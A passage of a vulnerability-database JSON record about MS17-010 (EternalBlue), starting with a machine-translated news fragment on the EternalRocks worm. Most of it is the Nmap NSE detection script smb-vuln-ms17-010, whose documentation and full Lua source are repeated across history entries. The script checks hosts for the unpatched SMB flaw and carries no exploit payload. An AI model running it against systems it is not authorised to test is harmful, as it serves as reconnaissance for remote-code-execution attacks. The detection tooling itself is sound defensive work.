EternalBlue\uff09 for a variety of hacking activities. In addition, the EternalBlue exploit for the SMB vulnerability MS17-010 has been ported to the Metasploit penetration testing framework, which allows researchers and attackers alike to easily take advantage of this vulnerability for different purposes.\n\nTherefore, beyond the massive global WannaCry attack, it is not surprising that a large number of hacker groups, state-sponsored actors, financially motivated cybercriminals and grey-hat hackers have used EternalBlue to launch attacks of varying scale.\n\nThe following are attacks exploiting the SMB vulnerability that security researchers recently discovered; some occurred before WannaCry and some after it.\n\n## One, EternalRocks worms\n\nOn 17 May, researchers found a new worm called EternalRocks that exploits the SMB vulnerability. Compared with WannaCry, which used two of the leaked NSA exploits and tools, EternalRocks uses considerably more. 
The worm Co-use of a four-section SMB vulnerability and three NSA hack tool include the following:\n\nEternalBlue \u2014 SMBv1 vulnerability\n\nEternalRomance \u2014 SMBv1 vulnerability\n\nEternalChampion \u2014 SMBv2 vulnerability\n\nEternalSynergy \u2014 SMBv3 vulnerability\n\nSMBTouch \u2014 SMB investigative tool\n\nArchTouch \u2014 SMB reconnaissance tool\n\n**[1] [[2]](<86371_2.htm>) [[3]](<86371_3.htm>) [[4]](<86371_4.htm>) [[5]](<86371_5.htm>) [[6]](<86371_6.htm>) [next](<86371_2.htm>)**\n", "title": "The SMB vulnerability triggered\u201cbloodshed\u201d, far more than WannaCry-vulnerability warning-the black bar safety net", "cvelist": ["CVE-2017-0143"], "objectVersion": "1.5", "type": "myhack58", "viewCount": 121, "reporter": "\u4f5a\u540d", "bulletinFamily": "info", "hash": "00c1186f6d04e02cd9a376721c157b3eb6a4e0364079bc101ecba5216ed03b81", "modified": "2017-05-23T00:00:00", "immutableFields": [], "cvss2": {"cvssV2": {"accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "COMPLETE", "baseScore": 9.3, "confidentialityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0"}, "exploitabilityScore": 8.6, "impactScore": 10.0, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "HIGH", "userInteractionRequired": false}, "cvss3": {"cvssV3": {"attackComplexity": "HIGH", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 8.1, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0"}, "exploitabilityScore": 2.2, "impactScore": 5.9}, "scheme": null}], "nmap": [{"id": "NMAP:SMB-VULN-MS17-010.NSE", "bulletinFamily": "scanner", "title": "smb-vuln-ms17-010 NSE Script", "description": "Attempts to detect if a 
Microsoft SMBv1 server is vulnerable to a remote code execution vulnerability (ms17-010, a.k.a. EternalBlue). The vulnerability is actively exploited by WannaCry and Petya ransomware and other malware. \n\nThe script connects to the IPC$ tree, executes a transaction on FID 0 and checks if the error \"STATUS_INSUFF_SERVER_RESOURCES\" is returned to determine if the target is not patched against ms17-010. Additionally, it checks for known error codes returned by patched systems. \n\nTested on Windows XP, 2003, 7, 8, 8.1, 10, 2008, 2012 and 2016. \n\nReferences: \n\n * https://technet.microsoft.com/en-us/library/security/ms17-010.aspx\n * https://blogs.technet.microsoft.com/msrc/2017/05/12/customer-guidance-for-wannacrypt-attacks/\n * https://msdn.microsoft.com/en-us/library/ee441489.aspx\n * https://github.com/rapid7/metasploit-framework/blob/master/modules/auxiliary/scanner/smb/smb_ms17_010.rb\n * https://github.com/cldrn/nmap-nse-scripts/wiki/Notes-about-smb-vuln-ms17-010\n\n### See also:\n\n * smb-double-pulsar-backdoor.nse \n\n## Script Arguments \n\n#### smb-vuln-ms17-010.sharename \n\nShare name to connect to. Default: IPC$\n\n#### smbdomain, smbhash, smbnoguest, smbpassword, smbtype, smbusername \n\nSee the documentation for the smbauth library. \n\n#### randomseed, smbbasic, smbport, smbsign \n\nSee the documentation for the smb library. \n\n#### vulns.short, vulns.showall \n\nSee the documentation for the vulns library. 
\n\n## Example Usage \n\n * nmap -p445 --script smb-vuln-ms17-010 <target>\n\n * nmap -p445 --script vuln <target>\n \n\n## Script Output \n \n \n Host script results:\n | smb-vuln-ms17-010:\n | VULNERABLE:\n | Remote Code Execution vulnerability in Microsoft SMBv1 servers (ms17-010)\n | State: VULNERABLE\n | IDs: CVE:CVE-2017-0143\n | Risk factor: HIGH\n | A critical remote code execution vulnerability exists in Microsoft SMBv1\n | servers (ms17-010).\n |\n | Disclosure date: 2017-03-14\n | References:\n | https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0143\n | https://technet.microsoft.com/en-us/library/security/ms17-010.aspx\n |_ https://blogs.technet.microsoft.com/msrc/2017/05/12/customer-guidance-for-wannacrypt-attacks/\n \n\n## Requires \n\n * nmap\n * smb\n * vulns\n * stdnse\n * string\n\n* * *\n", "published": "2017-05-27T07:57:34", "modified": "2018-06-28T13:40:30", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "href": "https://nmap.org/nsedoc/scripts/smb-vuln-ms17-010.html", "reporter": "Paulino Calderon <paulino()calderonpale.com>", "references": [], "cvelist": ["CVE-2017-0143"], "type": "nmap", "lastseen": "2021-08-23T12:08:20", "history": [{"bulletin": {"bulletinFamily": "scanner", "cvelist": ["CVE-2017-0143"], "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "description": "Attempts to detect if a Microsoft SMBv1 server is vulnerable to a remote code execution vulnerability (ms17-010, a.k.a. EternalBlue). The vulnerability is actively exploited by WannaCry and Petya ransomware and other malware. \n\nThe script connects to the $IPC tree, executes a transaction on FID 0 and checks if the error \"STATUS_INSUFF_SERVER_RESOURCES\" is returned to determine if the target is not patched against ms17-010. Additionally it checks for known error codes returned by patched systems. \n\nTested on Windows XP, 2003, 7, 8, 8.1, 10, 2008, 2012 and 2016. 
\n\nReferences: \n\n * https://technet.microsoft.com/en-us/library/security/ms17-010.aspx\n * https://blogs.technet.microsoft.com/msrc/2017/05/12/customer-guidance-for-wannacrypt-attacks/\n * https://msdn.microsoft.com/en-us/library/ee441489.aspx\n * https://github.com/rapid7/metasploit-framework/blob/master/modules/auxiliary/scanner/smb/smb_ms17_010.rb\n * https://github.com/cldrn/nmap-nse-scripts/wiki/Notes-about-smb-vuln-ms17-010\n\n### See also:\n\n * smb-double-pulsar-backdoor.nse \n\n## Script Arguments \n\n#### smb-vuln-ms17-010.sharename \n\nShare name to connect. Default: IPC$\n\n#### smbdomain, smbhash, smbnoguest, smbpassword, smbtype, smbusername \n\nSee the documentation for the smbauth library. \n\n#### randomseed, smbbasic, smbport, smbsign \n\nSee the documentation for the smb library. \n\n#### vulns.short, vulns.showall \n\nSee the documentation for the vulns library. \n\n## Example Usage \n\n * nmap -p445 --script smb-vuln-ms17-010 <target>\n\n * nmap -p445 --script vuln <target>\n \n\n## Script Output \n \n \n Host script results:\n | smb-vuln-ms17-010:\n | VULNERABLE:\n | Remote Code Execution vulnerability in Microsoft SMBv1 servers (ms17-010)\n | State: VULNERABLE\n | IDs: CVE:CVE-2017-0143\n | Risk factor: HIGH\n | A critical remote code execution vulnerability exists in Microsoft SMBv1\n | servers (ms17-010).\n |\n | Disclosure date: 2017-03-14\n | References:\n | https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0143\n | https://technet.microsoft.com/en-us/library/security/ms17-010.aspx\n |_ https://blogs.technet.microsoft.com/msrc/2017/05/12/customer-guidance-for-wannacrypt-attacks/\n \n\n## Requires \n\n * nmap\n * smb\n * vulns\n * stdnse\n * string\n\n* * *\n", "edition": 5, "enchantments": {"score": {"value": 7.2, "vector": "NONE"}}, "hash": "d62498d18b954b52be35dc2e4e9cdca7f74815777ed89faa80ee3d07b8787cb6", "hashmap": [{"hash": "2c4f3a4202dff921e10ce885637fccc8", "key": "sourceData"}, {"hash": "2f72f162101e843e99c7a567ce92e387", 
"key": "modified"}, {"hash": "4bf5c8ffb3442a2104d4824ac7f705a8", "key": "reporter"}, {"hash": "2076413bdcb42307d016f5286cbae795", "key": "cvss"}, {"hash": "9f8fb1e7d3bcd40e4dc80b0759608ca5", "key": "nmap"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "references"}, {"hash": "dad749029ff9320d6c901dd9054638ab", "key": "href"}, {"hash": "b6f2808e36c38d0e1749fe7cd6221774", "key": "published"}, {"hash": "3c468ec0659e4b43fe35808e6652bd9f", "key": "title"}, {"hash": "bbdaea376f500d25f6b0c1050311dd07", "key": "bulletinFamily"}, {"hash": "67164609e54a9c48368f8c8211098c3c", "key": "cvelist"}, {"hash": "7c0132070a0ef71d542663e9dc1f5dee", "key": "type"}, {"hash": "fd4a2d6b539b2b10358da6b71e7b6e46", "key": "description"}], "history": [], "href": "https://nmap.org/nsedoc/scripts/smb-vuln-ms17-010.html", "id": "NMAP:SMB-VULN-MS17-010.NSE", "lastseen": "2017-08-24T15:17:03", "modified": "2017-06-27T18:30:33", "nmap": {"categories": ["safe", "vuln"], "scriptType": "hostrule"}, "objectVersion": "1.3", "published": "2017-05-27T07:57:34", "references": [], "reporter": "Paulino Calderon <paulino()calderonpale.com>", "sourceData": "local nmap = require \"nmap\"\nlocal smb = require \"smb\"\nlocal vulns = require \"vulns\"\nlocal stdnse = require \"stdnse\"\nlocal string = require \"string\"\n\ndescription = [[\nAttempts to detect if a Microsoft SMBv1 server is vulnerable to a remote code\n execution vulnerability (ms17-010, a.k.a. EternalBlue).\n The vulnerability is actively exploited by WannaCry and Petya ransomware and other malware.\n\nThe script connects to the $IPC tree, executes a transaction on FID 0 and\n checks if the error \"STATUS_INSUFF_SERVER_RESOURCES\" is returned to\n determine if the target is not patched against ms17-010. 
Additionally it checks\n for known error codes returned by patched systems.\n\nTested on Windows XP, 2003, 7, 8, 8.1, 10, 2008, 2012 and 2016.\n\nReferences:\n* https://technet.microsoft.com/en-us/library/security/ms17-010.aspx\n* https://blogs.technet.microsoft.com/msrc/2017/05/12/customer-guidance-for-wannacrypt-attacks/\n* https://msdn.microsoft.com/en-us/library/ee441489.aspx\n* https://github.com/rapid7/metasploit-framework/blob/master/modules/auxiliary/scanner/smb/smb_ms17_010.rb\n* https://github.com/cldrn/nmap-nse-scripts/wiki/Notes-about-smb-vuln-ms17-010\n]]\n\n---\n-- @usage nmap -p445 --script smb-vuln-ms17-010 <target>\n-- @usage nmap -p445 --script vuln <target>\n--\n-- @see smb-double-pulsar-backdoor.nse\n--\n-- @output\n-- Host script results:\n-- | smb-vuln-ms17-010:\n-- | VULNERABLE:\n-- | Remote Code Execution vulnerability in Microsoft SMBv1 servers (ms17-010)\n-- | State: VULNERABLE\n-- | IDs: CVE:CVE-2017-0143\n-- | Risk factor: HIGH\n-- | A critical remote code execution vulnerability exists in Microsoft SMBv1\n-- | servers (ms17-010).\n-- |\n-- | Disclosure date: 2017-03-14\n-- | References:\n-- | https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0143\n-- | https://technet.microsoft.com/en-us/library/security/ms17-010.aspx\n-- |_ https://blogs.technet.microsoft.com/msrc/2017/05/12/customer-guidance-for-wannacrypt-attacks/\n--\n-- @xmloutput\n-- <table key=\"CVE-2017-0143\">\n-- <elem key=\"title\">Remote Code Execution vulnerability in Microsoft SMBv1 servers (ms17-010)</elem>\n-- <elem key=\"state\">VULNERABLE</elem>\n-- <table key=\"ids\">\n-- <elem>CVE:CVE-2017-0143</elem>\n-- </table>\n-- <table key=\"description\">\n-- <elem>A critical remote code execution vulnerability exists in Microsoft SMBv1&#xa; servers (ms17-010).&#xa;</elem>\n-- </table>\n-- <table key=\"dates\">\n-- <table key=\"disclosure\">\n-- <elem key=\"month\">03</elem>\n-- <elem key=\"year\">2017</elem>\n-- <elem key=\"day\">14</elem>\n-- </table>\n-- </table>\n-- 
<elem key=\"disclosure\">2017-03-14</elem>\n-- <table key=\"refs\">\n-- <elem>https://technet.microsoft.com/en-us/library/security/ms17-010.aspx</elem>\n-- <elem>https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0143</elem>\n-- <elem>https://blogs.technet.microsoft.com/msrc/2017/05/12/customer-guidance-for-wannacrypt-attacks/</elem>\n-- </table>\n-- </table>\n--\n-- @args smb-vuln-ms17-010.sharename Share name to connect. Default: IPC$\n---\n\nauthor = \"Paulino Calderon <paulino()calderonpale.com>\"\nlicense = \"Same as Nmap--See https://nmap.org/book/man-legal.html\"\ncategories = {\"vuln\", \"safe\"}\n\nhostrule = function(host)\n return smb.get_port(host) ~= nil\nend\n\nlocal function check_ms17010(host, port, sharename)\n local status, smbstate = smb.start_ex(host, true, true, \"\\\\\\\\\".. host.ip .. \"\\\\\" .. sharename, nil, nil, nil)\n if not status then\n stdnse.debug1(\"Could not connect to '%s'\", sharename)\n return false, string.format(\"Could not connect to '%s'\", sharename)\n else\n local overrides = {}\n local smb_header, smb_params, smb_cmd\n\n stdnse.debug1(\"Connected to share '%s'\", sharename)\n\n overrides['parameters_length'] = 0x10\n\n --SMB_COM_TRANSACTION opcode is 0x25\n smb_header = smb.smb_encode_header(smbstate, 0x25, overrides)\n smb_params = string.pack(\">I2 I2 I2 I2 B B I2 I4 I2 I2 I2 I2 I2 B B I2 I2 I2 I2 I2 I2\",\n 0x0, -- Total Parameter count (2 bytes)\n 0x0, -- Total Data count (2 bytes)\n 0xFFFF, -- Max Parameter count (2 bytes)\n 0xFFFF, -- Max Data count (2 bytes)\n 0x0, -- Max setup Count (1 byte)\n 0x0, -- Reserved (1 byte)\n 0x0, -- Flags (2 bytes)\n 0x0, -- Timeout (4 bytes)\n 0x0, -- Reserved (2 bytes)\n 0x0, -- ParameterCount (2 bytes)\n 0x4a00, -- ParameterOffset (2 bytes)\n 0x0, -- DataCount (2 bytes)\n 0x4a00, -- DataOffset (2 bytes)\n 0x02, -- SetupCount (1 byte)\n 0x0, -- Reserved (1 byte)\n 0x2300, -- PeekNamedPipe opcode\n 0x0, --\n 0x0700, -- BCC (Length of \"\\PIPE\\\")\n 0x5c50, -- \\P\n 0x4950, -- 
IP\n 0x455c -- E\\\n )\n stdnse.debug2(\"SMB: Sending SMB_COM_TRANSACTION\")\n local result, err = smb.smb_send(smbstate, smb_header, smb_params, '', overrides)\n if(result == false) then\n stdnse.debug1(\"There was an error in the SMB_COM_TRANSACTION request\")\n return false, err\n end\n\n local result, smb_header, _, _ = smb.smb_read(smbstate)\n local _ , smb_cmd, err = string.unpack(\"<c4 B I4\", smb_header)\n if smb_cmd == 37 then -- SMB command for Trans is 0x25\n stdnse.debug1(\"Valid SMB_COM_TRANSACTION response received\")\n\n --STATUS_INSUFF_SERVER_RESOURCES indicate that the machine is not patched\n if err == 0xc0000205 then\n stdnse.debug1(\"STATUS_INSUFF_SERVER_RESOURCES response received\")\n return true\n elseif err == 0xc0000022 then\n stdnse.debug1(\"STATUS_ACCESS_DENIED response received. This system is likely patched.\")\n return false, \"This system is patched.\"\n elseif err == 0xc0000008 then\n stdnse.debug1(\"STATUS_INVALID_HANDLE response received. This system is likely patched.\")\n return false, \"This system is patched.\"\n end\n stdnse.debug1(\"Error code received:%s\", stdnse.tohex(err))\n else\n stdnse.debug1(\"Received invalid command id.\")\n return false, string.format(\"Unexpected SMB response:%s\", stdnse.tohex(err))\n end\n end\nend\n\naction = function(host,port)\n local vuln_status, err\n local vuln = {\n title = \"Remote Code Execution vulnerability in Microsoft SMBv1 servers (ms17-010)\",\n IDS = {CVE = 'CVE-2017-0143'},\n risk_factor = \"HIGH\",\n description = [[\nA critical remote code execution vulnerability exists in Microsoft SMBv1\n servers (ms17-010).\n ]],\n references = {\n 'https://technet.microsoft.com/en-us/library/security/ms17-010.aspx',\n 'https://blogs.technet.microsoft.com/msrc/2017/05/12/customer-guidance-for-wannacrypt-attacks/'\n },\n dates = {\n disclosure = {year = '2017', month = '03', day = '14'},\n }\n }\n local sharename = stdnse.get_script_args(SCRIPT_NAME .. 
\".sharename\") or \"IPC$\"\n local report = vulns.Report:new(SCRIPT_NAME, host, port)\n vuln.state = vulns.STATE.NOT_VULN\n\n vuln_status, err = check_ms17010(host, port, sharename)\n if vuln_status then\n stdnse.debug1(\"This host is missing the patch for ms17-010!\")\n vuln.state = vulns.STATE.VULN\n else\n if nmap.verbosity() >=2 then\n return err\n end\n end\n return report:make_output(vuln)\nend\n", "title": "smb-vuln-ms17-010 NSE Script", "type": "nmap", "viewCount": 652}, "differentElements": ["modified", "sourceData"], "edition": 5, "lastseen": "2017-08-24T15:17:03"}, {"bulletin": {"bulletinFamily": "scanner", "cvelist": ["CVE-2017-0143"], "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "description": "Attempts to detect if a Microsoft SMBv1 server is vulnerable to a remote code execution vulnerability (ms17-010, a.k.a. EternalBlue). The vulnerability is actively exploited by WannaCry and Petya ransomware and other malware. \n\nThe script connects to the $IPC tree, executes a transaction on FID 0 and checks if the error \"STATUS_INSUFF_SERVER_RESOURCES\" is returned to determine if the target is not patched against ms17-010. Additionally it checks for known error codes returned by patched systems. \n\nTested on Windows XP, 2003, 7, 8, 8.1, 10, 2008, 2012 and 2016. \n\nReferences: \n\n * https://technet.microsoft.com/en-us/library/security/ms17-010.aspx\n * https://blogs.technet.microsoft.com/msrc/2017/05/12/customer-guidance-for-wannacrypt-attacks/\n * https://msdn.microsoft.com/en-us/library/ee441489.aspx\n * https://github.com/rapid7/metasploit-framework/blob/master/modules/auxiliary/scanner/smb/smb_ms17_010.rb\n * https://github.com/cldrn/nmap-nse-scripts/wiki/Notes-about-smb-vuln-ms17-010\n\n### See also:\n\n * smb-double-pulsar-backdoor.nse \n\n## Script Arguments \n\n#### smb-vuln-ms17-010.sharename \n\nShare name to connect. 
Default: IPC$\n\n#### smbdomain, smbhash, smbnoguest, smbpassword, smbtype, smbusername \n\nSee the documentation for the smbauth library. \n\n#### randomseed, smbbasic, smbport, smbsign \n\nSee the documentation for the smb library. \n\n#### vulns.short, vulns.showall \n\nSee the documentation for the vulns library. \n\n## Example Usage \n\n * nmap -p445 --script smb-vuln-ms17-010 <target>\n\n * nmap -p445 --script vuln <target>\n \n\n## Script Output \n \n \n Host script results:\n | smb-vuln-ms17-010:\n | VULNERABLE:\n | Remote Code Execution vulnerability in Microsoft SMBv1 servers (ms17-010)\n | State: VULNERABLE\n | IDs: CVE:CVE-2017-0143\n | Risk factor: HIGH\n | A critical remote code execution vulnerability exists in Microsoft SMBv1\n | servers (ms17-010).\n |\n | Disclosure date: 2017-03-14\n | References:\n | https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0143\n | https://technet.microsoft.com/en-us/library/security/ms17-010.aspx\n |_ https://blogs.technet.microsoft.com/msrc/2017/05/12/customer-guidance-for-wannacrypt-attacks/\n \n\n## Requires \n\n * nmap\n * smb\n * vulns\n * stdnse\n * string\n\n* * *\n", "edition": 6, "enchantments": {"dependencies": {"modified": "2018-06-30T16:19:11", "references": [{"idList": ["KLA10977", "KLA10979"], "type": "kaspersky"}, {"idList": ["TRENDMICROBLOG:657A275464AD59827A9E6C1CD1726546"], "type": "trendmicroblog"}, {"idList": ["MS17_010", "ETERNALBLUE"], "type": "canvas"}, {"idList": ["RAPID7COMMUNITY:B91CF4077282454499672A7AD6FBE744", "RAPID7COMMUNITY:4570AAF658D82BF591A6D6AB473704B6", "RAPID7COMMUNITY:9E4E3C72C90426CECD1801D8F0006388", "RAPID7COMMUNITY:761964EB7C8E68AD2D9E6DC0095DF4C0", "RAPID7COMMUNITY:8B3AE9E0999C9317B6911ECE10B8A820", "RAPID7COMMUNITY:D6095B3BBE1704D4062E19C249D178EC", "RAPID7COMMUNITY:3EEFED2F93F50D3C56A51C03A7A3513D", "RAPID7COMMUNITY:958C8DA808BCCA56E72237E0015ED607"], "type": "rapid7community"}, {"idList": ["SAINT:BD676E3751A4D110EAA275BF92CA7E46", 
"SAINT:DAEC4BA69103823E03C8F3C832C5B41D"], "type": "saint"}, {"idList": ["THREATPOST:7D1D823549046978FD52257C68DF7801", "THREATPOST:7E66A86C86BE8481D1B905B183CA42C3"], "type": "threatpost"}, {"idList": ["OPENVAS:1361412562310810676", "OPENVAS:1361412562310810810"], "type": "openvas"}, {"idList": ["TALOSBLOG:E2BCC6AEFE1A7A25F49757116346A7A6"], "type": "talosblog"}, {"idList": ["THN:C50AC2400E56ED88DBA7FC6DAC8360A8", "THN:BC214880895281474C1A8EF7B7D98C13", "THN:F12E2167FDA829ED32C7A16A83B048BF"], "type": "thn"}, {"idList": ["MSF:AUXILIARY/ADMIN/SMB/MS17_010_COMMAND", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE", "MSF:AUXILIARY/SCANNER/SMB/SMB_MS17_010", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE_WIN8", "MSF:EXPLOIT/LINUX/HTTP/ALIENVAULT_EXEC", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_PSEXEC"], "type": "metasploit"}, {"idList": ["1337DAY-ID-27786", "1337DAY-ID-27752", "1337DAY-ID-27613", "1337DAY-ID-29702"], "type": "zdt"}, {"idList": ["MYHACK58:62201786371"], "type": "myhack58"}, {"idList": ["EDB-ID:41987", "EDB-ID:41891", "EDB-ID:43970"], "type": "exploitdb"}, {"idList": ["CVE-2017-0143"], "type": "cve"}, {"idList": ["SSV:92952"], "type": "seebug"}, {"idList": ["SMNTC-96703"], "type": "symantec"}, {"idList": ["F5:K57181937"], "type": "f5"}, {"idList": ["MS17-010.NASL", "SMB_NT_MS17-010.NASL"], "type": "nessus"}, {"idList": ["HUAWEI-SA-20170513-01-WINDOWS"], "type": "huawei"}, {"idList": ["PACKETSTORM:146236", "PACKETSTORM:142181", "PACKETSTORM:142548"], "type": "packetstorm"}]}, "score": {"value": 7.2, "vector": "NONE"}}, "hash": "8a1a1baa07b4b60daf277304ce6a9b559c26ccd9ddd9a08bd3a423c355b47b57", "hashmap": [{"hash": "4bf5c8ffb3442a2104d4824ac7f705a8", "key": "reporter"}, {"hash": "2076413bdcb42307d016f5286cbae795", "key": "cvss"}, {"hash": "9f8fb1e7d3bcd40e4dc80b0759608ca5", "key": "nmap"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "references"}, {"hash": "5e9a31f584635b52c9b5b992d7c89f09", "key": "modified"}, {"hash": "dad749029ff9320d6c901dd9054638ab", 
"key": "href"}, {"hash": "b6f2808e36c38d0e1749fe7cd6221774", "key": "published"}, {"hash": "3c468ec0659e4b43fe35808e6652bd9f", "key": "title"}, {"hash": "bbdaea376f500d25f6b0c1050311dd07", "key": "bulletinFamily"}, {"hash": "67164609e54a9c48368f8c8211098c3c", "key": "cvelist"}, {"hash": "7c0132070a0ef71d542663e9dc1f5dee", "key": "type"}, {"hash": "4c6abb610ef2444ff085206adb66b74b", "key": "sourceData"}, {"hash": "fd4a2d6b539b2b10358da6b71e7b6e46", "key": "description"}], "history": [], "href": "https://nmap.org/nsedoc/scripts/smb-vuln-ms17-010.html", "id": "NMAP:SMB-VULN-MS17-010.NSE", "lastseen": "2018-06-30T16:19:11", "modified": "2018-06-28T13:40:30", "nmap": {"categories": ["safe", "vuln"], "scriptType": "hostrule"}, "objectVersion": "1.3", "published": "2017-05-27T07:57:34", "references": [], "reporter": "Paulino Calderon <paulino()calderonpale.com>", "sourceData": "local nmap = require \"nmap\"\nlocal smb = require \"smb\"\nlocal vulns = require \"vulns\"\nlocal stdnse = require \"stdnse\"\nlocal string = require \"string\"\n\ndescription = [[\nAttempts to detect if a Microsoft SMBv1 server is vulnerable to a remote code\n execution vulnerability (ms17-010, a.k.a. EternalBlue).\n The vulnerability is actively exploited by WannaCry and Petya ransomware and other malware.\n\nThe script connects to the $IPC tree, executes a transaction on FID 0 and\n checks if the error \"STATUS_INSUFF_SERVER_RESOURCES\" is returned to\n determine if the target is not patched against ms17-010. 
Additionally it checks\n for known error codes returned by patched systems.\n\nTested on Windows XP, 2003, 7, 8, 8.1, 10, 2008, 2012 and 2016.\n\nReferences:\n* https://technet.microsoft.com/en-us/library/security/ms17-010.aspx\n* https://blogs.technet.microsoft.com/msrc/2017/05/12/customer-guidance-for-wannacrypt-attacks/\n* https://msdn.microsoft.com/en-us/library/ee441489.aspx\n* https://github.com/rapid7/metasploit-framework/blob/master/modules/auxiliary/scanner/smb/smb_ms17_010.rb\n* https://github.com/cldrn/nmap-nse-scripts/wiki/Notes-about-smb-vuln-ms17-010\n]]\n\n---\n-- @usage nmap -p445 --script smb-vuln-ms17-010 <target>\n-- @usage nmap -p445 --script vuln <target>\n--\n-- @see smb-double-pulsar-backdoor.nse\n--\n-- @output\n-- Host script results:\n-- | smb-vuln-ms17-010:\n-- | VULNERABLE:\n-- | Remote Code Execution vulnerability in Microsoft SMBv1 servers (ms17-010)\n-- | State: VULNERABLE\n-- | IDs: CVE:CVE-2017-0143\n-- | Risk factor: HIGH\n-- | A critical remote code execution vulnerability exists in Microsoft SMBv1\n-- | servers (ms17-010).\n-- |\n-- | Disclosure date: 2017-03-14\n-- | References:\n-- | https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0143\n-- | https://technet.microsoft.com/en-us/library/security/ms17-010.aspx\n-- |_ https://blogs.technet.microsoft.com/msrc/2017/05/12/customer-guidance-for-wannacrypt-attacks/\n--\n-- @xmloutput\n-- <table key=\"CVE-2017-0143\">\n-- <elem key=\"title\">Remote Code Execution vulnerability in Microsoft SMBv1 servers (ms17-010)</elem>\n-- <elem key=\"state\">VULNERABLE</elem>\n-- <table key=\"ids\">\n-- <elem>CVE:CVE-2017-0143</elem>\n-- </table>\n-- <table key=\"description\">\n-- <elem>A critical remote code execution vulnerability exists in Microsoft SMBv1&#xa; servers (ms17-010).&#xa;</elem>\n-- </table>\n-- <table key=\"dates\">\n-- <table key=\"disclosure\">\n-- <elem key=\"month\">03</elem>\n-- <elem key=\"year\">2017</elem>\n-- <elem key=\"day\">14</elem>\n-- </table>\n-- </table>\n-- 
<elem key=\"disclosure\">2017-03-14</elem>\n-- <table key=\"refs\">\n-- <elem>https://technet.microsoft.com/en-us/library/security/ms17-010.aspx</elem>\n-- <elem>https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0143</elem>\n-- <elem>https://blogs.technet.microsoft.com/msrc/2017/05/12/customer-guidance-for-wannacrypt-attacks/</elem>\n-- </table>\n-- </table>\n--\n-- @args smb-vuln-ms17-010.sharename Share name to connect. Default: IPC$\n---\n\nauthor = \"Paulino Calderon <paulino()calderonpale.com>\"\nlicense = \"Same as Nmap--See https://nmap.org/book/man-legal.html\"\ncategories = {\"vuln\", \"safe\"}\n\nhostrule = function(host)\n return smb.get_port(host) ~= nil\nend\n\nlocal function check_ms17010(host, port, sharename)\n local status, smbstate = smb.start_ex(host, true, true, \"\\\\\\\\\".. host.ip .. \"\\\\\" .. sharename, nil, nil, nil)\n if not status then\n stdnse.debug1(\"Could not connect to '%s'\", sharename)\n return false, string.format(\"Could not connect to '%s'\", sharename)\n else\n local overrides = {}\n local smb_header, smb_params, smb_cmd\n\n stdnse.debug1(\"Connected to share '%s'\", sharename)\n\n overrides['parameters_length'] = 0x10\n\n --SMB_COM_TRANSACTION opcode is 0x25\n smb_header = smb.smb_encode_header(smbstate, 0x25, overrides)\n smb_params = string.pack(\">I2 I2 I2 I2 B B I2 I4 I2 I2 I2 I2 I2 B B I2 I2 I2 I2 I2 I2\",\n 0x0, -- Total Parameter count (2 bytes)\n 0x0, -- Total Data count (2 bytes)\n 0xFFFF, -- Max Parameter count (2 bytes)\n 0xFFFF, -- Max Data count (2 bytes)\n 0x0, -- Max setup Count (1 byte)\n 0x0, -- Reserved (1 byte)\n 0x0, -- Flags (2 bytes)\n 0x0, -- Timeout (4 bytes)\n 0x0, -- Reserved (2 bytes)\n 0x0, -- ParameterCount (2 bytes)\n 0x4a00, -- ParameterOffset (2 bytes)\n 0x0, -- DataCount (2 bytes)\n 0x4a00, -- DataOffset (2 bytes)\n 0x02, -- SetupCount (1 byte)\n 0x0, -- Reserved (1 byte)\n 0x2300, -- PeekNamedPipe opcode\n 0x0, --\n 0x0700, -- BCC (Length of \"\\PIPE\\\")\n 0x5c50, -- \\P\n 0x4950, -- 
IP\n 0x455c -- E\\\n )\n stdnse.debug2(\"SMB: Sending SMB_COM_TRANSACTION\")\n local result, err = smb.smb_send(smbstate, smb_header, smb_params, '', overrides)\n if(result == false) then\n stdnse.debug1(\"There was an error in the SMB_COM_TRANSACTION request\")\n return false, err\n end\n\n local result, smb_header, _, _ = smb.smb_read(smbstate)\n if not result then\n stdnse.debug1(\"Error reading SMB response: %s\", smb_header)\n -- error can happen if an (H)IPS resets the connection\n return false, smb_header\n end\n\n local _ , smb_cmd, err = string.unpack(\"<c4 B I4\", smb_header)\n if smb_cmd == 37 then -- SMB command for Trans is 0x25\n stdnse.debug1(\"Valid SMB_COM_TRANSACTION response received\")\n\n --STATUS_INSUFF_SERVER_RESOURCES indicate that the machine is not patched\n if err == 0xc0000205 then\n stdnse.debug1(\"STATUS_INSUFF_SERVER_RESOURCES response received\")\n return true\n elseif err == 0xc0000022 then\n stdnse.debug1(\"STATUS_ACCESS_DENIED response received. This system is likely patched.\")\n return false, \"This system is patched.\"\n elseif err == 0xc0000008 then\n stdnse.debug1(\"STATUS_INVALID_HANDLE response received. 
